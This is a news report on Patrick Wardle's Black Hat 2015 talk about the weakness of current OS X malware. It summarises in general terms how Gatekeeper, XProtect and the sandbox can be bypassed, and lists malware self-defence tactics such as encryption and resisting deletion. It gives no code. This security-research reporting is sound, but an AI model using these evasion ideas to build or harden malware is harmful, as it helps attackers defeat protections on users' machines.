Black Hat 2015: Mac OS X malware is mediocre, but could be better
Patrick Wardle demonstrated how to create a more effecting malware for OS X.
Apple technology is considered by many to be a lot more secure than other products, but that may not be the case.
In a jam-packed Wednesday session at Black Hat USA 2015 in Las Vegas, Patrick Wardle, director of research with Synack, explained that the current state of OS X malware is pretty mediocre, but has the potential to be a whole lot better.
Wardle kicked off the session discussing currently available malware, such as OSX/XSLCmd, OSX/iWorm, and OSX/WireLurker. He said that these threats show up as processes on the system and are therefore not very sophisticated, but he noted that OSX/WireLurker is slightly more interesting because it can infect iOS.
“Security conscious users,” those who do not click on emails and who frequently update and patch, “are probably going to be fine” against these types of threats, Wardle said, adding that the grade he gives current OS X malware is C+ since it is easy to detect and prevent.
In the quest to create a more sophisticated OS X threat, Wardle pointed to defensive mechanisms such as Gatekeeper, XProtect and the OS X sandbox when he said that “a few things are going to prevent this from being successful.”
But Wardle found a way around them all - he explained that Gatekeeper only verifies the app bundle and will simply protect users who think a fake installer is real; that XProtect does a decent job blocking known malware, but is trivial to bypass; and that with new sandbox escapes being identified, “I really don't think this is an obstacle for any advanced adversaries.”
While Wardle said that all of the bypasses require root, he added that obtaining it is not that complicated.
Additionally, Wardle noted that OS X malware authors should consider better self-defense techniques, including encrypting the malware and making the malware harder to delete. He added that detecting detections is also a “great early warning system,” and can be done by registering the hash with Google AdWords.
In his research, Wardle said he installed all available OS X security products - such as Norton and Avast - and none of them detected his malware. He pointed to free tools such as KnockKnock, BlockBlock and TaskExplorer as a better defense options against OS X threats.